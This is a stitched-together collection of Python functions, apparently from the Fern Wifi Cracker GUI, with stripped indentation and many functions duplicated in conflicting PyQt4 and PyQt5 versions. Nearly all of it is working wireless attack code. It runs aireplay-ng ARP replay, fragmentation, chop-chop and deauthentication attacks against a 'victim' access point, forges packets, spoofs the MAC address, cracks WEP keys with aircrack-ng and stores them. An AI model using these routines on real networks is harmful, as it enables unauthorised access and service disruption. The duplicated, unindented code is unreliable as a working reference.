def arp_request_thread(self):
access_point_mac = variables.victim_mac
monitor = variables.monitor_interface
variables.exec_command(
"%s aireplay-ng -3 -e '%s' -b %s %s" %
(variables.xterm_setting, victim_access_point, access_point_mac,
monitor), "/tmp/fern-log/WEP-DUMP/")
def key_found(self):
global victim_access_point
self.cracking_label_2.setEnabled(True)
self.cracking_label_2.setText('<font color=yellow>Cracking Encryption</font>')
self.finished_label.setEnabled(True)
self.finished_label.setText('<font color=yellow>Finished</font>')
self.new_automate_key()
self.key_label.setVisible(True)
self.key_label.setText('<font color=red>WEP KEY: %s</font>'%(self.WEP))
self.finished_label.setEnabled(True)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("%s/resources/wifi_4.png"%(os.getcwd())))
self.attack_button.setIcon(icon)
self.attack_button.setText('Attack')
self.thread_control = True
self.cancel_wep_attack()
variables.exec_command('killall airodump-ng')
variables.exec_command('killall airmon-ng')
if self.settings.setting_exists('capture_directory'):
shutil.copyfile('/tmp/fern-log/WEP-DUMP/wep_dump-01.cap',\
self.settings.read_last_settings('capture_directory') + '/%s_Capture_File(WEP).cap'%(victim_access_point))
self.tip_display() # Display Tips
def refresh_card_thread(self):
# Disable cards already on monitor modes
wireless_interfaces = str(subprocess.getstatusoutput('airmon-ng'))
prev_monitor = os.listdir('/sys/class/net')
monitor_interfaces_list = []
for monitors in prev_monitor:
if monitors in wireless_interfaces:
monitor_interfaces_list.append(monitors)
for monitored_interfaces in monitor_interfaces_list:
variables.exec_command('airmon-ng stop %s' %
(monitored_interfaces))
# List Interface cards
compatible_interface = str(subprocess.getoutput("airmon-ng"))
interface_list = os.listdir('/sys/class/net')
# Interate over interface output and update combo box
isHasCompatibleCard = False
for interface in interface_list:
if interface.lower() in compatible_interface.lower():
isHasCompatibleCard = True
break
if not isHasCompatibleCard:
self.interface_cards_not_found_signal.emit()
else:
for interface in interface_list:
if interface in compatible_interface:
if not interface.startswith('mon'):
self.interface_cards.append(interface)
self.interface_cards_found_signal.emit()
def key_found(self):
global victim_access_point
self.cracking_label_2.setEnabled(True)
self.cracking_label_2.setText(
'<font color=yellow>Cracking Encryption</font>')
self.finished_label.setEnabled(True)
self.finished_label.setText('<font color=yellow>Finished</font>')
self.new_automate_key()
self.key_label.setVisible(True)
self.key_label.setText('<font color=red>WEP KEY: %s</font>' %
(self.WEP))
self.finished_label.setEnabled(True)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("%s/resources/wifi_4.png" %
(os.getcwd())))
self.attack_button.setIcon(icon)
self.attack_button.setText('Attack')
self.thread_control = True
self.cancel_wep_attack()
variables.exec_command('killall airodump-ng')
variables.exec_command('killall airmon-ng')
if self.settings.setting_exists('capture_directory'):
shutil.copyfile('/tmp/fern-log/WEP-DUMP/wep_dump-01.cap', \
self.settings.read_last_settings('capture_directory') + '/%s_Capture_File(WEP).cap'%(victim_access_point))
self.tip_display() # Display Tips
def dump_thread(self):
wep_victim_channel = variables.victim_channel
access_point_mac = variables.victim_mac
monitor = variables.monitor_interface
variables.exec_command(
'%s airodump-ng -c %s -w /tmp/fern-log/WEP-DUMP/wep_dump --bssid %s %s'
% (variables.xterm_setting, wep_victim_channel, access_point_mac,
monitor), "/tmp/fern-log/WEP-DUMP/")
def crack_wep(self):
directory = '/tmp/fern-log/WEP-DUMP/'
variables.exec_command('killall aircrack-ng')
process = subprocess.Popen('aircrack-ng '+ directory + 'wep_dump-01.cap -l '+ directory + 'wep_key.txt',shell = True,stdout = subprocess.PIPE,stderr = subprocess.PIPE,stdin = subprocess.PIPE)
status = process.stdout
while 'wep_key.txt' not in os.listdir('/tmp/fern-log/WEP-DUMP/'):
if 'Failed. Next try with' in status.readline():
thread.start_new_thread(self.crack_wep,())
break
time.sleep(40)
def crack_wep(self):
directory = '/tmp/fern-log/WEP-DUMP/'
variables.exec_command('killall aircrack-ng')
process = subprocess.Popen('aircrack-ng '+ directory + '*.cap -l '+ directory + 'wep_key.txt',shell = True,stdout = subprocess.PIPE,stderr = subprocess.PIPE,stdin = subprocess.PIPE)
status = process.stdout
while 'wep_key.txt' not in os.listdir('/tmp/fern-log/WEP-DUMP/'):
if 'Failed. Next try with' in status.readline():
thread.start_new_thread(self.crack_wep,())
break
time.sleep(40)
def wep_attack_window(self):
if 'WEP-DUMP' not in os.listdir('/tmp/fern-log'):
os.mkdir('/tmp/fern-log/WEP-DUMP', 448) # 488 = Octal 700
else:
variables.exec_command('rm -r /tmp/fern-log/WEP-DUMP/*')
wep_run = wep_attack_dialog()
wep_run.update_database_label_signal.connect(self.update_database_label)
wep_run.stop_scan_signal.connect(self.stop_network_scan)
wep_run.exec_()
def wpa_attack_window(self):
variables.exec_command('killall aircrack-ng')
if 'WPA-DUMP' not in os.listdir('/tmp/fern-log'):
os.mkdir('/tmp/fern-log/WPA-DUMP', 448)
else:
variables.exec_command('rm -r /tmp/fern-log/WPA-DUMP/*')
wpa_run = wpa_attack_dialog()
wpa_run.update_database_label_signal.connect(self.update_database_label)
wpa_run.stop_scan_signal.connect(self.stop_network_scan)
wpa_run.exec_()
def refresh_interface(self):
variables.exec_command('killall airodump-ng')
variables.exec_command('killall airmon-ng')
self.animate_monitor_mode(True)
self.mon_label.clear()
self.interface_combo.clear()
self.interface_combo.setEnabled(True)
self.interface_cards = list()
t = threading.Thread(target=self.refresh_card_thread)
t.start()
def scan_process2_thread(self):
global error_catch
if bool(variables.xterm_setting):
wep_display_mode = 'xterm -T "FERN (WEP SCAN)" -geometry 100 -e' # if True or if xterm contains valid ascii characters
else:
wep_display_mode = ''
error_catch = variables.exec_command("%s 'airodump-ng -a --write /tmp/fern-log/zfern-wep --output-format csv\
--encrypt wep %s'" % (wep_display_mode, self.monitor_interface)) # FOR WEP
def scan_process4_thread1(self):
global error_catch
if bool(variables.xterm_setting): # if True or if xterm contains valid ascii characters
wpa_display_mode = 'xterm -T "FERN (WPA SCAN)" -geometry 100 -e'
else:
wpa_display_mode = ''
error_catch = variables.exec_command("%s 'airodump-ng -a --channel %s --write /tmp/fern-log/WPA/zfern-wpa \
--output-format csv --encrypt wpa %s'" % (
wpa_display_mode, variables.static_channel, self.monitor_interface))
def wep_launch_attack(self):
global wep_key_commit
if not self.button_control:
self.cancel_wep_attack()
return
if (is_already_Cracked(variables.victim_mac, "WEP")):
answer = QtWidgets.QMessageBox.question(
self, "Access Point Already Cracked",
variables.victim_access_point +
"'s key already exists in the database, Do you want to attack and update the already saved key?",
QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No)
if (answer == QtWidgets.QMessageBox.No):
self.control = True
return
self.button_control = False
self.control = True
self.ivs_number = 0
self.WEP = ''
wep_key_commit = 0
self.wep_disable_items()
self.stop_scan_signal.emit()
self.display_stop_icon_signal.emit()
variables.exec_command('rm -r /tmp/fern-log/WEP-DUMP/*')
# WPS AND REGULAR ATTACK STARTUP
if (self.wps_attack_radio.isChecked()): # WPS Attack Mode
variables.wps_functions.victim_MAC_Addr = variables.victim_mac
self.set_WPS_Objects(variables.wps_functions)
variables.wps_functions.start()
self.isfinished = False
else:
threading.Thread(
target=self.injection_status).start() # Regular Attack Mode
threading.Thread(target=self.run_wep_attack).start()
def scan_networks(self):
global xterm_setting
variables.exec_command("killall airodump-ng")
variables.exec_command('rm -r /tmp/fern-log/*.csv')
variables.exec_command('rm -r /tmp/fern-log/*.cap')
variables.exec_command('rm -r /tmp/fern-log/WPA/*.csv')
variables.exec_command('rm -r /tmp/fern-log/WPA/*.cap')
# Channel desision block
if self.scan_control == 0:
if self.scanner.state() == QtCore.QProcess.Running:
self.scanner.kill()
if not variables.static_channel:
self.scan_all_channels()
else:
self.scan_channel()
if self.scan_control != 1:
self.label_7.setText("<font Color=green>\t Active</font>")
threading.Thread(target=self.check_csv_for_networks).start()
def fragmentation_thread(self):
attacker_mac_address = variables.monitor_mac_address
monitor = variables.monitor_interface
access_point_mac = variables.victim_mac
variables.exec_command('%s aireplay-ng -5 -F -b %s -h %s %s'%(variables.xterm_setting,access_point_mac,attacker_mac_address,monitor),"/tmp/fern-log/WEP-DUMP/")
variables.exec_command('%s packetforge-ng -0 -a %s -h %s -k 255.255.255.255 -l 255.255.255.255 -y /tmp/fern-log/WEP-DUMP/*.xor -w /tmp/fern-log/WEP-DUMP/fragmented.cap'%(variables.xterm_setting,access_point_mac,attacker_mac_address),"/tmp/fern-log/WEP-DUMP/")
self.fragment_injecting_signal.emit()
variables.exec_command('%s aireplay-ng -2 -F -r /tmp/fern-log/WEP-DUMP/fragmented.cap %s'%(variables.xterm_setting,monitor),"/tmp/fern-log/WEP-DUMP/")
def wep_launch_attack(self):
global wep_key_commit
if not self.button_control:
self.cancel_wep_attack()
return
if(is_already_Cracked(variables.victim_mac,"WEP")):
answer = QtGui.QMessageBox.question(self,"Access Point Already Cracked",variables.victim_access_point + "'s key already exists in the database, Do you want to attack and update the already saved key?",QtGui.QMessageBox.Yes,QtGui.QMessageBox.No);
if(answer == QtGui.QMessageBox.No):
self.control = True
return
self.button_control = False
self.control = True
self.ivs_number = 0
self.WEP = ''
wep_key_commit = 0
self.wep_disable_items()
self.emit(QtCore.SIGNAL("stop scan"))
self.emit(QtCore.SIGNAL("display stop icon"))
variables.exec_command('rm -r /tmp/fern-log/WEP-DUMP/*')
# WPS AND REGULAR ATTACK STARTUP
if(self.wps_attack_radio.isChecked()): # WPS Attack Mode
variables.wps_functions.victim_MAC_Addr = variables.victim_mac
self.set_WPS_Objects(variables.wps_functions)
variables.wps_functions.start()
self.isfinished = False
else:
thread.start_new_thread(self.injection_status,()) # Regular Attack Mode
thread.start_new_thread(self.run_wep_attack,())
def fragmentation_thread(self):
attacker_mac_address = variables.monitor_mac_address
monitor = variables.monitor_interface
access_point_mac = variables.victim_mac
variables.exec_command('%s aireplay-ng -5 -F -b %s -h %s %s'%(variables.xterm_setting,access_point_mac,attacker_mac_address,monitor),"/tmp/fern-log/WEP-DUMP/")
variables.exec_command('%s packetforge-ng -0 -a %s -h %s -k 255.255.255.255 -l 255.255.255.255 -y /tmp/fern-log/WEP-DUMP/*.xor -w /tmp/fern-log/WEP-DUMP/fragmented.cap'%(variables.xterm_setting,access_point_mac,attacker_mac_address),"/tmp/fern-log/WEP-DUMP/")
self.emit(QtCore.SIGNAL("fragment injecting"))
variables.exec_command('%s aireplay-ng -2 -F -r /tmp/fern-log/WEP-DUMP/fragmented.cap %s'%(variables.xterm_setting,monitor),"/tmp/fern-log/WEP-DUMP/")
def cancel_wep_attack(self):
self.button_control = True
variables.exec_command('killall airodump-ng')
variables.exec_command('killall aircrack-ng')
variables.exec_command('killall aireplay-ng')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("%s/resources/wifi_4.png"%(os.getcwd())))
self.attack_button.setIcon(icon)
self.attack_button.setText("Attack")
if(self.wps_attack_radio.isChecked()):
variables.wps_functions.stop_Attack_WPS_Device()
def cancel_wep_attack(self):
self.button_control = True
variables.exec_command('killall airodump-ng')
variables.exec_command('killall aircrack-ng')
variables.exec_command('killall aireplay-ng')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("%s/resources/wifi_4.png"%(os.getcwd())))
self.attack_button.setIcon(icon)
self.attack_button.setText("Attack")
if(self.wps_attack_radio.isChecked()):
variables.wps_functions.stop_Attack_WPS_Device()
def key_check(self):
global wep_key_commit
while 'wep_key.txt' not in os.listdir('/tmp/fern-log/WEP-DUMP/'):
self.emit(QtCore.SIGNAL("key not found yet"))
time.sleep(2)
key = reader('/tmp/fern-log/WEP-DUMP/wep_key.txt')
self.WEP = key
self.emit(QtCore.SIGNAL("wep found"))
variables.exec_command('killall aircrack-ng')
variables.exec_command('killall aireplay-ng')
variables.exec_command('killall airmon-ng')
variables.exec_command('killall airodump-ng')
if len(self.WEP) > 0:
if wep_key_commit == 0:
set_key_entries(variables.victim_access_point,variables.victim_mac,'WEP',str(self.WEP.replace(':','')),variables.victim_channel) #Add WEP Key to Database Here
self.emit(QtCore.SIGNAL('update database label'))
wep_key_commit += 1
self.isfinished = True
def stop_scan_network(self):
global error_catch
global scan_control
scan_control = 1
variables.exec_command('rm -r /tmp/fern-log/*.cap')
variables.exec_command('killall airodump-ng')
variables.exec_command('killall airmon-ng')
self.label_7.setText("<font Color=red>\t Stopped</font>")
variables.wps_functions.stop_WPS_Scanning() # Stops WPS scanning
self.wep_clientlabel.setText("None Detected")
self.wpa_clientlabel.setText("None Detected")
self.scan_button.clicked.disconnect(self.stop_scan_network)
self.scan_button.clicked.connect(self.scan_network)
def key_check(self):
global wep_key_commit
while 'wep_key.txt' not in os.listdir('/tmp/fern-log/WEP-DUMP/'):
self.key_not_found_yet_signal.emit()
time.sleep(2)
key = reader('/tmp/fern-log/WEP-DUMP/wep_key.txt')
self.WEP = key
self.wep_found_signal.emit()
variables.exec_command('killall aircrack-ng')
variables.exec_command('killall aireplay-ng')
variables.exec_command('killall airmon-ng')
variables.exec_command('killall airodump-ng')
if len(self.WEP) > 0:
if wep_key_commit == 0:
set_key_entries(variables.victim_access_point,variables.victim_mac,'WEP',str(self.WEP.replace(':','')),variables.victim_channel) #Add WEP Key to Database Here
self.update_database_label_signal.emit()
wep_key_commit += 1
self.isfinished = True
def chop_chop_thread(self):
attacker_mac_address = variables.monitor_mac_address
monitor = variables.monitor_interface
access_point_mac = variables.victim_mac
variables.exec_command(
'%s aireplay-ng -4 -F -h %s %s' %
(variables.xterm_setting, attacker_mac_address, monitor),
"/tmp/fern-log/WEP-DUMP/")
variables.exec_command(
'%s packetforge-ng -0 -a %s -h %s -k 255.255.255.255 -l 255.255.255.255 -y \
/tmp/fern-log/WEP-DUMP/*.xor -w /tmp/fern-log/WEP-DUMP/chop_chop.cap'
%
(variables.xterm_setting, access_point_mac, attacker_mac_address),
"/tmp/fern-log/WEP-DUMP/")
self.emit(QtCore.SIGNAL("chop-chop injecting"))
self.emit(QtCore.SIGNAL("chop-chop injecting"))
variables.exec_command(
'%s aireplay-ng -2 -F -r /tmp/fern-log/WEP-DUMP/chop_chop.cap %s' %
(variables.xterm_setting, monitor), "/tmp/fern-log/WEP-DUMP/")
def wpa_capture(self):
monitor_interface = variables.monitor_interface
variables.exec_command(
'%s airodump-ng --bssid %s --channel %s -w /tmp/fern-log/WPA-DUMP/wpa_dump %s'
% (variables.xterm_setting, variables.victim_mac,
variables.victim_channel, monitor_interface))
def probe_for_Client_Mac(self):
variables.exec_command(
"airodump-ng -a --channel %s --write /tmp/fern-log/WPA/zfern-wpa \
--output-format csv --encrypt wpa %s"
% (variables.victim_channel, variables.monitor_interface))
def capture_check(self):
variables.exec_command('cd /tmp/fern-log/WPA-DUMP/ \n aircrack-ng *.cap | tee capture_status.log')
def scan_wep(self):
global xterm_setting
variables.exec_command('rm -r /tmp/fern-log/*.csv')
variables.exec_command('rm -r /tmp/fern-log/*.cap')
variables.exec_command('rm -r /tmp/fern-log/WPA/*.csv')
variables.exec_command('rm -r /tmp/fern-log/WPA/*.cap')
# Channel desision block
if scan_control == 0:
if not variables.static_channel:
if len(variables.xterm_setting) == 0:
threading.Thread(target=self.scan_process1_thread).start()
threading.Thread(target=self.scan_process1_thread1).start()
else:
threading.Thread(target=self.scan_process2_thread).start()
threading.Thread(target=self.scan_process2_thread1).start()
else:
if len(variables.xterm_setting) == 0:
threading.Thread(target=self.scan_process3_thread).start()
threading.Thread(target=self.scan_process3_thread1).start()
else:
threading.Thread(target=self.scan_process4_thread).start()
threading.Thread(target=self.scan_process4_thread1).start()
time.sleep(5)
if scan_control != 1:
self.label_7.setText("<font Color=green>\t Active</font>")
while scan_control != 1:
try:
time.sleep(2)
wep_access_file = str(reader('/tmp/fern-log/zfern-wep-01.csv')
) # WEP access point log file
wpa_access_file = str(
reader('/tmp/fern-log/WPA/zfern-wpa-01.csv')
) # WPA access point log file
wep_access_convert = wep_access_file[0:wep_access_file.
index('Station MAC')]
wep_access_process = wep_access_convert[wep_access_convert.
index('Key'):-1]
wep_access_process1 = wep_access_process.strip('Key\r\n')
process = wep_access_process1.splitlines()
# Display number of WEP access points detected
wep_devices = 0
for line in wpa_access_file.splitlines():
if "WEP" in line:
wep_devices += 1
self.wep_count = str(
wep_devices) # number of access points wep detected
if int(self.wep_count) > 0:
self.wep_number_changed_signal.emit()
self.wep_button_true_signal.emit()
else:
self.wep_button_false_signal.emit()
for iterate in range(len(process)):
detail_process1 = process[iterate]
wep_access = detail_process1.split(',')
mac_address = wep_access[0].strip(' ') # Mac address
channel = wep_access[3].strip(' ') # Channel
speed = wep_access[4].strip(' ') # Speed
power = wep_access[8].strip(' ') # Power
access_point = wep_access[13].strip(
' ') # Access point Name
if access_point not in wep_details.keys():
wep_details[access_point] = [
mac_address, channel, speed, power
]
# WPA Access point sort starts here
# Display number of WEP access points detected
self.wpa_count = str(wpa_access_file.count(
'WPA')) # number of access points wep detected
wpa_devices = 0
for line in wpa_access_file.splitlines():
if "WPA" in line or "WPA2" in line:
wpa_devices += 1
self.wpa_count = str(wpa_devices)
if int(self.wpa_count) == 0:
self.wpa_button_false_signal.emit()
elif int(self.wpa_count) >= 1:
self.wpa_button_true_signal.emit()
self.wpa_number_changed_signal.emit()
else:
self.wpa_button_false_signal.emit()
wpa_access_convert = wpa_access_file[0:wpa_access_file.
index('Station MAC')]
wpa_access_process = wpa_access_convert[wpa_access_convert.
index('Key'):-1]
wpa_access_process1 = wpa_access_process.strip('Key\r\n')
process = wpa_access_process1.splitlines()
for iterate in range(len(process)):
detail_process1 = process[iterate]
wpa_access = detail_process1.split(',')
mac_address = wpa_access[0].strip(' ') # Mac address
channel = wpa_access[3].strip(' ') # Channel
speed = wpa_access[4].strip(' ') # Speed
power = wpa_access[8].strip(' ') # Power
access_point = wpa_access[13].strip(
' ') # Access point Name
if access_point not in wpa_details.keys():
wpa_details[access_point] = [
mac_address, channel, speed, power
]
except (ValueError, IndexError):
pass
def scan_process3_thread(self):
global error_catch
error_catch = variables.exec_command(
"airodump-ng --channel %s --write /tmp/fern-log/zfern \
--output-format netxml %s" %
(variables.static_channel, self.monitor_interface))
def probe_for_Client_Mac(self):
variables.exec_command("airodump-ng -a --channel %s --write /tmp/fern-log/WPA/zfern-wpa \
--output-format csv --encrypt wpa %s"%(variables.victim_channel,variables.monitor_interface))
def arp_request_thread(self):
access_point_mac = variables.victim_mac
monitor = variables.monitor_interface
variables.exec_command("%s aireplay-ng -3 -e '%s' -b %s %s"%(variables.xterm_setting,victim_access_point,access_point_mac,monitor),"/tmp/fern-log/WEP-DUMP/")
def deauthenticate_client(self):
monitor_interface = variables.monitor_interface
variables.exec_command('%s aireplay-ng -a %s -c %s -0 5 %s'%(variables.xterm_setting,variables.victim_mac,self.select_client,monitor_interface))
def deauthenticate_client(self):
monitor_interface = variables.monitor_interface
variables.exec_command('%s aireplay-ng -a %s -c %s -0 5 %s' %
(variables.xterm_setting, variables.victim_mac,
self.select_client, monitor_interface))
def set_monitor_thread(self, monitor_card, mac_setting_exists,
last_settings):
self.killConflictProcesses()
subprocess.getstatusoutput(
'ifconfig %s down' % (self.monitor_interface)
) # Avoid this: "ioctl(SIOCSIWMODE) failed: Device or resource busy"
status = str(
subprocess.getoutput("airmon-ng start %s" % (monitor_card)))
messages = ("monitor mode enabled", "monitor mode vif enabled",
"monitor mode already")
monitor_created = False
for x in messages:
if (x in status):
monitor_created = True
if (monitor_created):
monitor_interface_process = str(subprocess.getoutput("airmon-ng"))
regex = re.compile("mon\d", re.IGNORECASE)
interfaces = regex.findall(monitor_interface_process)
if len(interfaces) == 0:
regex = re.compile("wlan\dmon", re.IGNORECASE)
interfaces = regex.findall(monitor_interface_process)
if len(interfaces) == 0:
self.monitor_failed_signal.emit()
return
interfaces = regex.findall(monitor_interface_process)
if (interfaces):
self.monitor_interface = interfaces[0]
else:
self.monitor_interface = monitor_card
variables.monitor_interface = self.monitor_interface
self.interface_combo.setEnabled(False)
variables.wps_functions.monitor_interface = self.monitor_interface
self.monitor_mode_enabled_signal.emit()
# Create Fake Mac Address and index for use
mon_down = subprocess.getstatusoutput('ifconfig %s down' %
(self.monitor_interface))
if mac_setting_exists:
variables.exec_command('macchanger -m %s %s' %
(last_settings, self.monitor_interface))
else:
variables.exec_command('macchanger -A %s' %
(self.monitor_interface))
# mon_up = subprocess.getstatusoutput('ifconfig %s up'%(self.monitor_interface)) # Lets leave interface down to avoid channel looping during channel specific attack
subprocess.getstatusoutput('ifconfig %s down' %
(self.monitor_interface))
for iterate in os.listdir('/sys/class/net'):
if str(iterate) == str(self.monitor_interface):
os.chmod(
'/sys/class/net/' + self.monitor_interface +
'/address', 0o777)
variables.monitor_mac_address = reader(
'/sys/class/net/' + self.monitor_interface +
'/address').strip()
variables.wps_functions.monitor_mac_address = variables.monitor_mac_address
else:
self.monitor_failed_signal.emit()
def scan_wep(self):
global xterm_setting
variables.exec_command('rm -r /tmp/fern-log/*.netxml')
variables.exec_command('rm -r /tmp/fern-log/*.cap')
variables.exec_command('rm -r /tmp/fern-log/WPA/*.netxml')
variables.exec_command('rm -r /tmp/fern-log/WPA/*.cap')
# Channel desision block
if scan_control == 0:
if not variables.static_channel:
if len(variables.xterm_setting) == 0:
threading.Thread(target=self.scan_process1_thread).start()
else:
threading.Thread(target=self.scan_process2_thread).start()
else:
if len(variables.xterm_setting) == 0:
threading.Thread(target=self.scan_process3_thread).start()
else:
threading.Thread(target=self.scan_process4_thread).start()
threading.Thread(target=self.scan_process4_thread1).start()
time.sleep(5)
if scan_control != 1:
self.label_7.setText("<font Color=green>\t Active</font>")
while scan_control != 1:
try:
time.sleep(2)
scan_tree = ElementTree.parse(
'/tmp/fern-log/zfern-01.kismet.netxml').getroot() #
for access_point_info in scan_tree:
ssid_info = access_point_info.find("SSID")
is_essid_hidden = ssid_info.find("essid").attrib['cloaked']
if is_essid_hidden == "false":
# is_beacon = ssid_info.find("type").text == "Beacon"
access_point = ssid_info.find("essid").text
encryption = ssid_info.find("encryption").text
mac_address = access_point_info.find("BSSID").text
channel = access_point_info.find("channel").text
power = access_point_info.find("snr-info").find(
"last_signal_dbm").text
speed = access_point_info.find("maxseenrate").text
if speed:
speed = "%d" % (int(speed) / 1000)
if str(encryption).upper().startswith("WPA"):
if access_point not in wpa_details.keys():
self.wpa_count += 1
wpa_details[access_point] = [
mac_address, channel, speed, power
]
if str(encryption).upper().startswith("WEP"):
if access_point not in wep_details.keys():
self.wep_count += 1
wep_details[access_point] = [
mac_address, channel, speed, power
]
if int(self.wep_count) > 0:
self.wep_number_changed_signal.emit()
self.wep_button_true_signal.emit()
else:
self.wep_button_false_signal.emit()
if int(self.wpa_count) > 0:
self.wpa_button_true_signal.emit()
self.wpa_number_changed_signal.emit()
else:
self.wpa_button_false_signal.emit()
except Exception as e:
print("Error occurred during scan: ", e)
def dump_thread(self):
wep_victim_channel = variables.victim_channel
access_point_mac = variables.victim_mac
monitor = variables.monitor_interface
variables.exec_command('%s airodump-ng -c %s -w /tmp/fern-log/WEP-DUMP/wep_dump --bssid %s %s'%(variables.xterm_setting,wep_victim_channel,access_point_mac,monitor),"/tmp/fern-log/WEP-DUMP/")
def capture_check(self):
variables.exec_command(
'cd /tmp/fern-log/WPA-DUMP/ \n aircrack-ng *.cap | tee capture_status.log'
)
def stop_network_scan(self):
global scan_control
scan_control = 1
variables.exec_command('killall airodump-ng')
variables.exec_command('killall airmon-ng')
self.label_7.setText("<font Color=red>\t Stopped</font>")
def wpa_capture(self):
monitor_interface = variables.monitor_interface
variables.exec_command('%s airodump-ng --bssid %s --channel %s -w /tmp/fern-log/WPA-DUMP/wpa_dump %s'%(variables.xterm_setting,variables.victim_mac,variables.victim_channel,monitor_interface))
def scan_process1_thread(self):
global error_catch
error_catch = variables.exec_command(
"airodump-ng --write /tmp/fern-log/zfern-wep --output-format csv \
--encrypt wep %s" %
(self.monitor_interface)) # FOR WEP
def update_launcher(self):
''' Downloads and installs update files
'''
global svn_access
global file_total
global files_downloaded
global fern_directory
file_total = int()
files_downloaded = int()
fern_directory = os.getcwd()
update_directory = '/tmp/Fern-Wifi-Cracker/'
try:
online_response_check = request.urlopen(
'https://raw.githubusercontent.com/savio-code/fern-wifi-cracker/master/Fern-Wifi-Cracker/version'
)
online_response = online_response_check.read().decode(
"ascii", errors="ignore")
online_files = re.compile('total_files = \d+', re.IGNORECASE)
for online_file_total in online_response.splitlines():
if re.match(online_files, online_file_total):
file_total = int(online_file_total.split()[2])
if 'Fern-Wifi-Cracker' in os.listdir('/tmp/'):
variables.exec_command('rm -r /tmp/Fern-Wifi-Cracker')
svn_access = subprocess.Popen(
'cd /tmp/ \n svn checkout https://github.com/savio-code/fern-wifi-cracker/trunk/Fern-Wifi-Cracker/', \
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
svn_update = svn_access.stdout
t = threading.Thread(target=self.update_error)
t.start()
while True:
response = svn_update.readline()
if len(response) > 0:
files_downloaded += 1
self.file_downloaded_signal.emit()
if str('revision') in str(response):
self.finished_downloading_signal.emit()
# Delete all old files (*.py,*.py etc) except ".font_setting.dat" file
for old_file in os.listdir(os.getcwd()):
if os.path.isfile(
os.getcwd() + os.sep +
old_file) and old_file != '.font_settings.dat':
os.remove(os.getcwd() + os.sep + old_file)
# Delete all old directories except the "key-database" directory
for old_directory in os.listdir(os.getcwd()):
if os.path.isdir(os.getcwd() + os.sep + old_directory
) and old_directory != 'key-database':
shutil.rmtree(os.getcwd() + os.sep + old_directory)
for update_file in os.listdir(
'/tmp/Fern-Wifi-Cracker'
): # Copy New update files to working directory
if os.path.isfile(update_directory + update_file):
shutil.copyfile(update_directory + update_file,
os.getcwd() + os.sep + update_file)
else:
shutil.copytree(update_directory + update_file,
os.getcwd() + os.sep + update_file)
for new_file in os.listdir(os.getcwd(
)): # chmod New files to allow permissions
os.chmod(os.getcwd() + os.sep + new_file, 0o777)
time.sleep(5)
self.restart_application_signal.emit()
break
if len(svn_failure_message) > 2:
self.download_failed_signal.emit()
break
except (request.URLError, request.HTTPError):
self.download_failed_signal.emit()
def scan_process3_thread1(self):
global error_catch
error_catch = variables.exec_command(
"airodump-ng --channel %s --write /tmp/fern-log/WPA/zfern-wpa \
--output-format csv --encrypt wpa %s" %
(variables.static_channel, self.monitor_interface)) # FOR WPA
